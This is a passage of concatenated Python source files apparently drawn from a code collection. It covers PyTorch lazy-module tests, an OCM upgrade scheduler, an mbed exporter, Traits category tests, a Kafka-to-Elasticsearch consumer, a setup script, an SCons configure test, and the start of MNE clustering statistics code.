(32, 16, 2, 2, 2), (32,))
@suppress_warnings
def test_lazy_conv3d_state(self):
self._check_lazy_conv_state(lambda: nn.Conv3d(16, 32, 2),
lambda: nn.LazyConv3d(32, 2),
(32, 16, 2, 2, 2), (32,))
@suppress_warnings
def test_lazy_conv_transposed1d(self):
self._check_lazy_conv(nn.ConvTranspose1d, nn.LazyConvTranspose1d, torch.nn.functional.conv_transpose1d,
(32, 2), (192, 16, 50), (16, 32, 2), (32,))
@suppress_warnings
def test_lazy_conv_transpose1d_pickle(self):
self._check_lazy_conv_pickle(nn.ConvTranspose1d, nn.LazyConvTranspose1d, (32, 2),
(192, 16, 50), (16, 32, 2), (32,))
@suppress_warnings
def test_lazy_conv_transpose1d_state(self):
self._check_lazy_conv_state(lambda: nn.ConvTranspose1d(16, 32, 2),
lambda: nn.LazyConvTranspose1d(32, 2),
(16, 32, 2), (32,))
@suppress_warnings
def test_lazy_conv_transpose2d(self):
self._check_lazy_conv(nn.ConvTranspose2d, nn.LazyConvTranspose2d, torch.nn.functional.conv_transpose2d,
(32, 2), (192, 16, 8, 6), (16, 32, 2, 2), (32,))
@suppress_warnings
def test_lazy_conv_transpose2d_pickle(self):
self._check_lazy_conv_pickle(nn.ConvTranspose2d, nn.LazyConvTranspose2d, (32, 2),
(192, 16, 8, 6), (16, 32, 2, 2), (32,))
@suppress_warnings
def test_lazy_conv_transpose2d_state(self):
self._check_lazy_conv_state(lambda: nn.ConvTranspose2d(16, 32, 2),
lambda: nn.LazyConvTranspose2d(32, 2),
(16, 32, 2, 2), (32,))
@suppress_warnings
def test_lazy_conv_transpose3d(self):
self._check_lazy_conv(nn.ConvTranspose3d, nn.LazyConvTranspose3d, torch.nn.functional.conv_transpose3d,
(32, 2), (192, 16, 8, 7, 6), (16, 32, 2, 2, 2), (32,))
@suppress_warnings
def test_lazy_conv_transpose3d_pickle(self):
self._check_lazy_conv_pickle(nn.ConvTranspose3d, nn.LazyConvTranspose3d, (32, 2),
(192, 16, 8, 7, 6), (16, 32, 2, 2, 2), (32,))
@suppress_warnings
def test_lazy_conv_transpose3d_state(self):
self._check_lazy_conv_state(lambda: nn.ConvTranspose3d(16, 32, 2),
lambda: nn.LazyConvTranspose3d(32, 2),
(16, 32, 2, 2, 2), (32,))
def _check_lazy_norm(self, cls, lazy_cls, input_shape):
for affine in [False, True]:
for track_running_stats in [False, True]:
lazy_module = lazy_cls(affine=affine, track_running_stats=track_running_stats)
if affine:
self.assertIsInstance(lazy_module.weight, UninitializedParameter)
self.assertIsInstance(lazy_module.bias, UninitializedParameter)
if track_running_stats:
self.assertIsInstance(lazy_module.running_mean, UninitializedBuffer)
self.assertIsInstance(lazy_module.running_var, UninitializedBuffer)
input = torch.ones(*input_shape)
lazy_output = lazy_module(input)
self.assertIsInstance(lazy_module, cls)
self.assertNotIsInstance(lazy_module, lazy_cls)
num_features = input_shape[1]
module = cls(num_features, affine=affine, track_running_stats=track_running_stats)
expected_output = module(input)
self.assertEqual(lazy_output, expected_output)
if module.weight is not None:
self.assertEqual(lazy_module.weight.shape, module.weight.shape)
self.assertEqual(lazy_module.weight, module.weight)
if module.bias is not None:
self.assertEqual(lazy_module.bias.shape, module.bias.shape)
self.assertEqual(lazy_module.bias, module.bias)
if module.running_mean is not None:
self.assertEqual(lazy_module.running_mean.shape, module.running_mean.shape)
self.assertEqual(lazy_module.running_mean, module.running_mean)
if module.running_var is not None:
self.assertEqual(lazy_module.running_var.shape, module.running_var.shape)
self.assertEqual(lazy_module.running_var, module.running_var)
if module.num_batches_tracked is not None:
self.assertEqual(lazy_module.num_batches_tracked.shape, module.num_batches_tracked.shape)
self.assertEqual(lazy_module.num_batches_tracked, module.num_batches_tracked)
def _check_lazy_norm_pickle(self, cls, lazy_cls, input_shape):
for affine in [False, True]:
for track_running_stats in [False, True]:
module = lazy_cls(affine=affine, track_running_stats=track_running_stats)
module = pickle.loads(pickle.dumps(module))
self.assertIsInstance(module, lazy_cls)
if affine:
self.assertIsInstance(module.weight, UninitializedParameter)
self.assertIsInstance(module.bias, UninitializedParameter)
if track_running_stats:
self.assertIsInstance(module.running_mean, UninitializedBuffer)
self.assertIsInstance(module.running_var, UninitializedBuffer)
input = torch.ones(*input_shape)
module(input) # fully materialized
module = pickle.loads(pickle.dumps(module))
self.assertNotIsInstance(module, lazy_cls)
self.assertIsInstance(module, cls)
if affine:
self.assertNotIsInstance(module.weight, UninitializedParameter)
self.assertNotIsInstance(module.bias, UninitializedParameter)
if track_running_stats:
self.assertNotIsInstance(module.running_mean, UninitializedBuffer)
self.assertNotIsInstance(module.running_var, UninitializedBuffer)
def _check_lazy_batchnorm_state(self, cls, lazy_cls):
module = cls(10)
lazy_module = lazy_cls(affine=True, track_running_stats=True)
lazy_module.load_state_dict(module.state_dict())
# Parameters have been initialized but the module won't become a full
# BatchNorm one until the first forward pass. This is due to
# limitations on the state_dict loading logic
self.assertFalse(lazy_module.has_uninitialized_params())
self.assertEqual(lazy_module.weight.shape, (10,))
self.assertEqual(lazy_module.bias.shape, (10,))
self.assertEqual(lazy_module.running_mean.shape, (10,))
self.assertEqual(lazy_module.running_var.shape, (10,))
module = cls(10)
lazy_module = lazy_cls()
with self.assertRaisesRegex(RuntimeError, 'shape of an uninitialized'):
module.load_state_dict(lazy_module.state_dict())
def _check_lazy_instancenorm_state(self, cls, lazy_cls):
for affine in [False, True]:
for track_running_stats in [False, True]:
module = cls(10, affine=affine, track_running_stats=track_running_stats)
lazy_module = lazy_cls(affine=affine, track_running_stats=track_running_stats)
lazy_module.load_state_dict(module.state_dict())
# Parameters have been initialized but the module won't become a full
# InstanceNorm one until the first forward pass. This is due to
# limitations on the state_dict loading logic
self.assertFalse(lazy_module.has_uninitialized_params())
if affine:
self.assertEqual(lazy_module.weight.shape, (10,))
self.assertEqual(lazy_module.bias.shape, (10,))
if track_running_stats:
self.assertEqual(lazy_module.running_mean.shape, (10,))
self.assertEqual(lazy_module.running_var.shape, (10,))
module = cls(10, affine=True, track_running_stats=True)
lazy_module = lazy_cls(affine=True, track_running_stats=True)
with self.assertRaisesRegex(RuntimeError, 'shape of an uninitialized'):
module.load_state_dict(lazy_module.state_dict())
def test_lazy_batchnorm1d(self):
self._check_lazy_norm(nn.BatchNorm1d, nn.LazyBatchNorm1d, (16, 3, 6))
self._check_lazy_norm(nn.BatchNorm1d, nn.LazyBatchNorm1d, (16, 6))
def test_lazy_batchnorm1d_pickle(self):
self._check_lazy_norm_pickle(nn.BatchNorm1d, nn.LazyBatchNorm1d, (16, 3, 6))
self._check_lazy_norm_pickle(nn.BatchNorm1d, nn.LazyBatchNorm1d, (16, 6))
def test_lazy_batchnorm1d_state(self):
self._check_lazy_batchnorm_state(nn.BatchNorm1d, nn.LazyBatchNorm1d)
def test_lazy_batchnorm2d(self):
self._check_lazy_norm(nn.BatchNorm2d, nn.LazyBatchNorm2d, (16, 3, 6, 7))
def test_lazy_batchnorm2d_pickle(self):
self._check_lazy_norm_pickle(nn.BatchNorm2d, nn.LazyBatchNorm2d, (16, 3, 6, 7))
def test_lazy_batchnorm2d_state(self):
self._check_lazy_batchnorm_state(nn.BatchNorm2d, nn.LazyBatchNorm2d)
def test_lazy_batchnorm3d(self):
self._check_lazy_norm(nn.BatchNorm3d, nn.LazyBatchNorm3d, (16, 3, 6, 7, 8))
def test_lazy_batchnorm3d_pickle(self):
self._check_lazy_norm_pickle(nn.BatchNorm3d, nn.LazyBatchNorm3d, (16, 3, 6, 7, 8))
def test_lazy_batchnorm3d_state(self):
self._check_lazy_batchnorm_state(nn.BatchNorm3d, nn.LazyBatchNorm3d)
def test_lazy_instancenorm1d(self):
self._check_lazy_norm(nn.InstanceNorm1d, nn.LazyInstanceNorm1d, (16, 3, 6))
def test_lazy_instancenorm1d_pickle(self):
self._check_lazy_norm_pickle(nn.InstanceNorm1d, nn.LazyInstanceNorm1d, (16, 3, 6))
def test_lazy_instancenorm1d_state(self):
self._check_lazy_instancenorm_state(nn.InstanceNorm1d, nn.LazyInstanceNorm1d)
def test_lazy_instancenorm2d(self):
self._check_lazy_norm(nn.InstanceNorm2d, nn.LazyInstanceNorm2d, (16, 3, 6, 7))
def test_lazy_instancenorm2d_pickle(self):
self._check_lazy_norm_pickle(nn.InstanceNorm2d, nn.LazyInstanceNorm2d, (16, 3, 6, 7))
def test_lazy_instancenorm2d_state(self):
self._check_lazy_instancenorm_state(nn.InstanceNorm2d, nn.LazyInstanceNorm2d)
def test_lazy_instancenorm3d(self):
self._check_lazy_norm(nn.InstanceNorm3d, nn.LazyInstanceNorm3d, (16, 3, 6, 7, 8))
def test_lazy_instancenorm3d_pickle(self):
self._check_lazy_norm_pickle(nn.InstanceNorm3d, nn.LazyInstanceNorm3d, (16, 3, 6, 7, 8))
def test_lazy_instancenorm3d_state(self):
self._check_lazy_instancenorm_state(nn.InstanceNorm3d, nn.LazyInstanceNorm3d)
@suppress_warnings
def test_materialize_dtype(self):
module = LazyModule()
module.register_parameter('test_param', UninitializedParameter())
module.test_param.materialize(10)
self.assertTrue(module.test_param.dtype == torch.float64)
module = LazyModule()
module.register_parameter('test_param', UninitializedParameter())
module.half()
module.test_param.materialize(10)
self.assertTrue(module.test_param.dtype == torch.float16)
@unittest.skipIf(not TEST_CUDA, 'CUDA not available')
@suppress_warnings
def test_materialize_device(self):
module = LazyModule()
module.register_parameter('test_param', UninitializedParameter())
module.test_param.materialize(10)
self.assertTrue(module.test_param.device.type == 'cpu')
module = LazyModule()
module.register_parameter('test_param', UninitializedParameter())
module.cuda()
module.test_param.materialize(10)
self.assertTrue(module.test_param.device.type == 'cuda')
@suppress_warnings
def test_chained_initialization(self):
class MyNetwork(torch.nn.Module):
def __init__(self):
super(MyNetwork, self).__init__()
self.linear_1 = torch.nn.LazyLinear(15)
self.linear_2 = torch.nn.LazyLinear(10)
def forward(self, x):
y = self.linear_1(x)
return self.linear_2(y)
net = MyNetwork()
net(torch.ones(5, 10))
self.assertTrue(net.linear_1.weight.shape == (15, 10))
self.assertTrue(net.linear_1.bias.shape == (15,))
self.assertTrue(net.linear_2.weight.shape == (10, 15))
self.assertTrue(net.linear_2.bias.shape == (10,))
@suppress_warnings
def test_optimizer_pass(self):
optimizers = [torch.optim.Adadelta, torch.optim.Adagrad, torch.optim.Adam,
torch.optim.AdamW, torch.optim.Adamax,
torch.optim.ASGD, torch.optim.SGD, torch.optim.Rprop,
torch.optim.RMSprop, torch.optim.LBFGS]
def run_step(module, optim):
self.assertIsInstance(optim.param_groups[0]['params'][0], UninitializedParameter)
module.test_param.materialize(10)
self.assertIsInstance(optim.param_groups[0]['params'][0], Parameter)
self.assertNotIsInstance(optim.param_groups[0]['params'][0], UninitializedParameter)
for p in module.parameters():
p.grad = torch.rand_like(p)
if isinstance(optim, torch.optim.LBFGS):
optim.step(lambda: 1.0)
else:
optim.step()
for optim_cls in optimizers:
module = LazyModule()
module.register_parameter('test_param', UninitializedParameter())
if optim_cls is torch.optim.SGD:
optim = optim_cls(module.parameters(), lr=0.0)
elif optim_cls is torch.optim.Adagrad:
with self.assertRaisesRegex(ValueError, 'uninitialized parameter'):
optim = optim_cls(module.parameters())
continue
else:
optim = optim_cls(module.parameters())
run_step(module, optim)
@suppress_warnings
def test_weight_norm(self):
m = nn.LazyLinear(7)
with self.assertRaisesRegex(ValueError, 'have uninitialized parameters.'):
m = torch.nn.utils.weight_norm(m)
@suppress_warnings
def test_spectral_norm(self):
m = nn.LazyLinear(7)
with self.assertRaisesRegex(ValueError, 'have uninitialized parameters.'):
m = torch.nn.utils.spectral_norm(m)
@suppress_warnings
def test_invalid_functions(self):
param = torch.nn.parameter.UninitializedParameter()
with self.assertRaisesRegex(ValueError, 'uninitialized parameter'):
torch.empty_like(param)
with self.assertRaisesRegex(ValueError, 'uninitialized parameter'):
torch.add(param, param)
with self.assertRaisesRegex(ValueError, 'uninitialized parameter'):
param + param
class TestFunctionalPickle(TestCase):
# issue gh-38137
def test_pickle_softsign(self):
# Make sure it does not throw an exception
s = pickle.dumps(F.softsign)
class TestStateDictHooks(TestCase):
def test_load_state_dict_pre_hook(self):
m = nn.Linear(10, 10)
m_state_dict = m.state_dict()
m_load = nn.Linear(10, 10)
hook_called = 0
def hook_without_module(state_dict, prefix, local_metadata, strict, missing_keys, unexpected_keys, error_msgs):
self.assertEqual(m_state_dict, state_dict)
nonlocal hook_called
hook_called += 1
def hook_with_module(module, state_dict, prefix, local_metadata, strict, missing_keys, unexpected_keys, error_msgs):
self.assertEqual(m_state_dict, state_dict)
self.assertTrue(m_load is module)
nonlocal hook_called
hook_called += 1
hook_called = 0
m_load._register_load_state_dict_pre_hook(hook_without_module)
m_load.load_state_dict(m_state_dict)
self.assertEqual(1, hook_called)
hook_called = 0
m_load._register_load_state_dict_pre_hook(hook_with_module, True)
m_load.load_state_dict(m_state_dict)
self.assertEqual(2, hook_called)
def test_load_state_dict_module_pre_hook(self):
hook_called = 0
# Test with module instance method as hook
class MyModule(nn.Module):
def __init__(self):
super(MyModule, self).__init__()
self.foo = torch.nn.Parameter(torch.rand(10))
def my_pre_load_hook(self, state_dict, prefix, local_metadata, strict, missing_keys, unexpected_keys, error_msgs):
assert [] == error_msgs
assert [] == unexpected_keys
assert [] == missing_keys
assert strict
nonlocal hook_called
hook_called += 1
def my_pre_load_hook_with_module(
self,
module,
state_dict,
prefix,
local_metadata,
strict,
missing_keys,
unexpected_keys,
error_msgs,
):
assert [] == error_msgs
assert [] == unexpected_keys
assert [] == missing_keys
assert strict
assert self is module
nonlocal hook_called
hook_called += 1
m = MyModule()
state_dict = m.state_dict()
hook_called = 0
m._register_load_state_dict_pre_hook(m.my_pre_load_hook)
m.load_state_dict(state_dict)
self.assertEqual(1, hook_called)
hook_called = 0
m._register_load_state_dict_pre_hook(m.my_pre_load_hook_with_module, True)
m.load_state_dict(state_dict)
self.assertEqual(2, hook_called)
instantiate_device_type_tests(TestNNDeviceType, globals())
if __name__ == '__main__':
run_tests()
|
the-stack_0_19820 | import sys
import logging
import reconcile.queries as queries
from utils.ocm import OCMMap
QONTRACT_INTEGRATION = 'ocm-upgrade-scheduler'
def fetch_current_state(clusters):
settings = queries.get_app_interface_settings()
ocm_map = OCMMap(clusters=clusters, integration=QONTRACT_INTEGRATION,
settings=settings)
current_state = []
for cluster in clusters:
cluster_name = cluster['name']
ocm = ocm_map.get(cluster_name)
upgrade_policies = \
ocm.get_upgrade_policies(cluster_name, schedule_type='automatic')
for upgrade_policy in upgrade_policies:
upgrade_policy['cluster'] = cluster_name
current_state.append(upgrade_policy)
return ocm_map, current_state
def fetch_desired_state(clusters):
desired_state = []
for cluster in clusters:
cluster_name = cluster['name']
upgrade_policy = cluster['upgradePolicy']
upgrade_policy['cluster'] = cluster_name
desired_state.append(upgrade_policy)
return desired_state
def calculate_diff(current_state, desired_state):
diffs = []
err = False
for d in desired_state:
c = [c for c in current_state
if d.items() <= c.items()]
if not c:
d['action'] = 'create'
diffs.append(d)
for c in current_state:
d = [d for d in desired_state
if d.items() <= c.items()]
if not d:
c['action'] = 'delete'
diffs.append(c)
return diffs, err
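# Illustrative sketch (hypothetical policies, not from app-interface):
# matching uses dict-subset comparison, so a desired policy matches any
# current policy that contains all of its key/value pairs. An unmatched
# desired policy yields a 'create' diff; an unmatched current policy
# yields a 'delete' diff.
def _example_calculate_diff():
    current = [{'cluster': 'a', 'schedule': '0 0 * * 1'}]
    desired = [{'cluster': 'b', 'schedule': '0 0 * * 1'}]
    diffs, err = calculate_diff(current, desired)
    # diffs -> [{'cluster': 'b', 'schedule': '0 0 * * 1', 'action': 'create'},
    #           {'cluster': 'a', 'schedule': '0 0 * * 1', 'action': 'delete'}]
    return diffs, err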
def sort_diffs(diff):
if diff['action'] == 'delete':
return 1
else:
return 2
def act(dry_run, diffs, ocm_map):
diffs.sort(key=sort_diffs)
for diff in diffs:
action = diff.pop('action')
cluster = diff.pop('cluster')
logging.info([action, cluster])
if not dry_run:
ocm = ocm_map.get(cluster)
if action == 'create':
ocm.create_upgrade_policy(cluster, diff)
elif action == 'delete':
ocm.delete_upgrade_policy(cluster, diff)
def run(dry_run, gitlab_project_id=None, thread_pool_size=10):
clusters = queries.get_clusters()
clusters = [c for c in clusters if c.get('upgradePolicy') is not None]
if not clusters:
logging.debug("No upgradePolicy definitions found in app-interface")
sys.exit(0)
ocm_map, current_state = fetch_current_state(clusters)
desired_state = fetch_desired_state(clusters)
diffs, err = calculate_diff(current_state, desired_state)
act(dry_run, diffs, ocm_map)
if err:
sys.exit(1)
|
the-stack_0_19821 | """
mbed SDK
Copyright (c) 2011-2013 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from exporters import Exporter
from os.path import splitext, basename
class CodeSourcery(Exporter):
NAME = 'CodeSourcery'
TOOLCHAIN = 'GCC_CS'
TARGETS = [
'LPC1768',
'UBLOX_C027',
'ARCH_PRO',
]
DOT_IN_RELATIVE_PATH = True
def generate(self):
# "make" wants Unix paths
self.resources.win_to_unix()
to_be_compiled = []
for r_type in ['s_sources', 'c_sources', 'cpp_sources']:
r = getattr(self.resources, r_type)
if r:
for source in r:
base, ext = splitext(source)
to_be_compiled.append(base + '.o')
libraries = []
for lib in self.resources.libraries:
l, _ = splitext(basename(lib))
libraries.append(l[3:])
ctx = {
'name': self.program_name,
'to_be_compiled': to_be_compiled,
'object_files': self.resources.objects,
'include_paths': self.resources.inc_dirs,
'library_paths': self.resources.lib_dirs,
'linker_script': self.resources.linker_script,
'libraries': libraries,
'symbols': self.toolchain.get_symbols()
}
self.gen_file('codesourcery_%s.tmpl' % self.target.lower(), ctx, 'Makefile')
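# Illustrative sketch (hypothetical path): library names above are derived
# by stripping the file extension and the conventional "lib" prefix, so an
# archive such as "mbed/libmylib.a" contributes "mylib" to the generated
# Makefile's library list.
def _example_library_name(lib_path='mbed/libmylib.a'):
    l, _ = splitext(basename(lib_path))
    return l[3:]  # -> 'mylib'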
|
the-stack_0_19822 | #------------------------------------------------------------------------------
# Copyright (c) 2005, Enthought, Inc.
# All rights reserved.
#
# This software is provided without warranty under the terms of the BSD
# license included in enthought/LICENSE.txt and may be redistributed only
# under the conditions described in the aforementioned license. The license
# is also available online at http://www.enthought.com/licenses/BSD.txt
# Thanks for using Enthought open source!
#
# Author: David C. Morrill
# Description: <Traits component>
#------------------------------------------------------------------------------
import unittest
from enthought.traits.api import HasTraits, Category, Str, TraitError
class Base( HasTraits ) :
y = Str("Base y")
z = Str("Base z")
class BaseExtra( Category, Base ) :
x = Str("BaseExtra x")
class BasePlus( Category, Base ) :
p = Str("BasePlus p")
# z = Str("BasePlus z") overrides not allowed.
class BasePlusPlus( BasePlus ) :
pp = Str("BasePlusPlus pp")
class CategoryTestCase( unittest.TestCase ) :
""" Test cases for traits category """
def setUp( self ) :
self.base = Base()
return
def test_base_category(self) :
""" Base class with traits """
self.assertEqual( self.base.y, "Base y", msg="y != 'Base y'" )
self.assertEqual( self.base.z, "Base z", msg="z != 'Base z'" )
return
def test_extra_extension_category(self) :
""" Base class extended with a category subclass """
self.assertEqual( self.base.x, "BaseExtra x", msg="x != 'BaseExtra x'" )
return
def test_plus_extension_category(self) :
""" Base class extended with two category subclasses """
self.assertEqual( self.base.x, "BaseExtra x", msg="x != 'BaseExtra x'" )
self.assertEqual( self.base.p, "BasePlus p", msg="p != 'BasePlus p'" )
return
def test_subclass_extension_category(self) :
""" Category subclass does not extend base class.
This test demonstrates that Traits allows subclassing of a Category
class, but the traits from the subclass are not actually added
to the base class of the Category.
Seems like the declaration of the subclass (BasePlusPlus) should fail.
"""
try :
x = self.base.pp
self.fail( msg="base.pp should have thrown AttributeError "
"as Category subclassing is not supported." )
except AttributeError :
pass
basepp = BasePlusPlus()
return
def test_subclass_instance_category(self) :
""" Category subclass instantiation not supportted.
This test demonstrates that Traits allows subclassing of a Category
class and that the subclass can be instantiated, but the traits of the
parent class are not inherited.
Seems like the declaration of the subclass (BasePlusPlus) should fail.
"""
bpp = BasePlusPlus()
self.assertEqual( bpp.pp, "BasePlusPlus pp",
msg="pp != 'BasePlusPlus pp'" )
try :
self.assertEqual( bpp.p, "BasePlus p", msg="p != 'BasePlus p'" )
self.fail( msg="bpp.p should have thrown SystemError as "
"instantiating a subclass of a category is not supported." )
except SystemError :
pass
return
#
# support running this test individually, from the command-line as a script
#
if __name__ == '__main__':
unittest.main()
#### EOF ######################################################################
|
the-stack_0_19823 | from __future__ import print_function, absolute_import
from numpy.linalg import norm as euclidean
from numpy import array
class SubjectModel:
def __init__(self, num_s_samples,
pose_x=None, pose_y=None, pose_z=None, rad=0.6, height=1.7):
"""
Height is defined in $SPHINX_ROOT/actors/pedestrian.actor
Radius is checked by placing the pedestrian in a cylinder in the simulation.
rad=0.5 also works (still ok)
:param pose_x:
:param pose_y:
:param pose_z:
:param rad:
:param height:
"""
self.x = (-1, pose_x)
self.y = (-1, pose_y)
self.z = (-1, pose_z)
self.radius = float(rad)
self.height = float(height)
def __repr__(self):
return "(Subject ({},{},{}))".format(self.x[1], self.y[1], self.z[1])
def reset(self):
"""Resets the model to default values"""
self.x = (-1, None)
self.y = (-1, None)
self.z = (-1, None)
def set_val(self, ts, uid, val):
if uid == "x":
self.x = (ts, val)
elif uid == "y":
self.y = (ts, val)
elif uid == "z":
self.z = (ts, val)
def check_if_pos(self, uid):
val = {"x": self.x[1], "y": self.y[1], "z": self.z[1]}.get(uid)
return val is None
def get_pos(self):
"""A nice way to implement it would be checking timestamp on 3 coords"""
return (self.x[1], self.y[1], self.z[1])
def complete(self):
"""
Checks if the position data is right, i.e., all the timestamps are
the same and the data is not empty.
"""
(t1, x) = self.x
(t2, y) = self.y
(t3, z) = self.z
return ((-1) != t1 == t2 == t3) and all([t is not None for t in [x,y,z]])
def distance_to(self, point):
"""
:param point: A tuple (x,y,z)
"""
curr_pose = array([self.x[1], self.y[1], self.z[1]])
if point[2] <= self.height:
# Ignore Z axis
dist = euclidean(array(point[:2]), curr_pose[:2]) - self.radius
else:
# Use maximum height and no radius
centr = curr_pose + array([0, 0, self.height])
dist = euclidean(array(centr), array(point))
return dist
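# Illustrative usage (hypothetical coordinates): the subject is modelled as
# a cylinder, so a point below the subject's height is measured against the
# cylinder wall (XY Euclidean distance minus the radius).
def _example_distance_to():
    subject = SubjectModel(num_s_samples=1)
    for uid, val in [("x", 0.0), ("y", 0.0), ("z", 0.0)]:
        subject.set_val(0, uid, val)
    return subject.distance_to((2.0, 0.0, 1.0))  # -> 1.4 (2.0 - 0.6 radius)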
|
the-stack_0_19824 | import setuptools
from os import path
with open("README.md", "r") as fh:
long_description = fh.read()
def parse_requirements(filename):
""" load requirements from a pip requirements file """
with open(filename) as f:
    lineiter = [line.strip() for line in f]
return [line for line in lineiter if line and not line.startswith("#")]
setuptools.setup(
name="pandiet",
version="0.1.7",
author="Makoto Yui",
author_email="[email protected]",
license = "BSD-3-Clause",
license_file = "LICENSE",
description="A library to reduce memory consumption of Pandas Dataframes",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/myui/pandiet",
project_urls={
'Bug Tracker': 'https://github.com/myui/pandiet/issues',
'Source': 'https://github.com/myui/pandiet/',
},
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 3 - Alpha',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
# Specify the Python versions you support here.
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3 :: Only',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
],
packages=setuptools.find_packages(),
install_requires=parse_requirements('requirements.txt'),
setup_requires=["pytest-runner"],
tests_require=["pytest", "pytest-cov"],
python_requires=">=3.7,<4",
) |
the-stack_0_19826 | #!/usr/bin/env python
#
# Copyright (c) 2001 - 2016 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "test/Configure/build-fail.py rel_2.5.1:3735:9dc6cee5c168 2016/11/03 14:02:02 bdbaddog"
"""
Verify that Configure tests work even after an earlier test fails.
This was broken in 0.98.3 because we'd mark the /usr/bin/g++ compiler
as having failed (because it was on the candidates list as the implicit
command dependency for both the object file and executable generated
for the configuration test) and then avoid trying to rebuild anything
else that used the "failed" Node.
Thanks to Ben Webb for the test case.
"""
import os
import re
import TestSCons
_obj = TestSCons._obj
test = TestSCons.TestSCons(match = TestSCons.match_re_dotall)
test.subdir('a', 'b')
a_boost_hpp = os.path.join('..', 'a', 'boost.hpp')
b_boost_hpp = os.path.join('..', 'b', 'boost.hpp')
test.write('SConstruct', """\
import os
def _check(context):
for dir in ['a', 'b']:
inc = os.path.join('..', dir, 'boost.hpp')
result = context.TryRun('''
#include "%s"
int main() { return 0; }
''' % inc, '.cpp')[0]
if result:
import sys
sys.stdout.write('%s: ' % inc)
break
context.Result(result)
return result
env = Environment()
conf = env.Configure(custom_tests={'CheckBoost':_check})
conf.CheckBoost()
conf.Finish()
""")
test.write(['b', 'boost.hpp'], """#define FILE "b/boost.hpp"\n""")
expect = test.wrap_stdout(read_str = "%s: yes\n" % re.escape(b_boost_hpp),
build_str = "scons: `.' is up to date.\n")
test.run(arguments='--config=force', stdout=expect)
expect = test.wrap_stdout(read_str = "%s: yes\n" % re.escape(a_boost_hpp),
build_str = "scons: `.' is up to date.\n")
test.write(['a', 'boost.hpp'], """#define FILE "a/boost.hpp"\n""")
test.run(arguments='--config=force', stdout=expect)
test.run()
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
the-stack_0_19827 | from kafka import KafkaConsumer
from json import loads
import sys
from elasticsearch import Elasticsearch
consumer = KafkaConsumer(
# Update the topic name below to match your deployment (e.g. 'teb_topic')
'teb_topic',
bootstrap_servers=['localhost:9092'],
api_version=(0,10),
auto_offset_reset='earliest',
enable_auto_commit=True,
group_id='my-group',
value_deserializer=lambda x: loads(x.decode('utf-8')))
es = Elasticsearch()
i = 0
print("waiting for messages...")
for message in consumer:
message = message.value
res = es.index(index="test-index", doc_type='log', id=i, body=message)
#print(res['result'])
res = es.get(index="test-index", doc_type='log', id=i)
print(res['_source'])
sys.stdout.write(str(res['_source']) + '\n')
i = i + 1
es.indices.refresh(index="test-index")
if i == 10:
break
#res = es.search(index="test-index", body={"query": {"match_all": {}}})
#print("Got %d Hits:" % res['hits']['total'])
#for hit in res['hits']['hits']:
# print("%(log_date)s %(author)s: %(text)s" % hit["_source"])
# sys.stdout.write(str(message)) |
the-stack_0_19831 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Authors: Thorsten Kranz <[email protected]>
# Alexandre Gramfort <[email protected]>
# Martin Luessi <[email protected]>
# Eric Larson <[email protected]>
# Denis Engemann <[email protected]>
#
# License: Simplified BSD
import numpy as np
from scipy import stats, sparse, ndimage
import warnings
import logging
from .parametric import f_oneway
from ..parallel import parallel_func, check_n_jobs
from ..utils import split_list, logger, verbose, ProgressBar
from ..fixes import in1d, unravel_index
from ..source_estimate import SourceEstimate
def _get_clusters_spatial(s, neighbors):
"""Helper function to form spatial clusters using neighbor lists
This is equivalent to _get_components with n_times = 1, with a properly
reconfigured connectivity matrix (formed as "neighbors" list)
"""
# s is a vector of spatial indices that are significant, like:
# s = np.where(x_in)[0]
# for x_in representing a single time-instant
r = np.ones(s.shape, dtype=bool)
clusters = list()
next_ind = 0 if s.size > 0 else None
while next_ind is not None:
# put first point in a cluster, adjust remaining
t_inds = [next_ind]
r[next_ind] = False
icount = 1 # count of nodes in the current cluster
while icount <= len(t_inds):
ind = t_inds[icount - 1]
# look across other vertices
buddies = np.where(r)[0]
buddies = buddies[in1d(s[buddies], neighbors[s[ind]],
assume_unique=True)]
t_inds += buddies.tolist()
r[buddies] = False
icount += 1
# this is equivalent to np.where(r)[0] for these purposes, but it's
# a little bit faster. Unfortunately there's no way to tell numpy
# just to find the first instance (to save checking every one):
next_ind = np.argmax(r)
if next_ind == 0:
next_ind = None
clusters.append(s[t_inds])
return clusters
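# Minimal sketch (hypothetical data): vertices 0-1-2 form a chain and
# vertex 3 is isolated, so the significant vertices {0, 1, 3} split into
# two spatial clusters.
def _example_get_clusters_spatial():
    neighbors = [np.array([1]), np.array([0, 2]),
                 np.array([1]), np.array([], dtype=int)]
    s = np.array([0, 1, 3])  # indices of significant vertices
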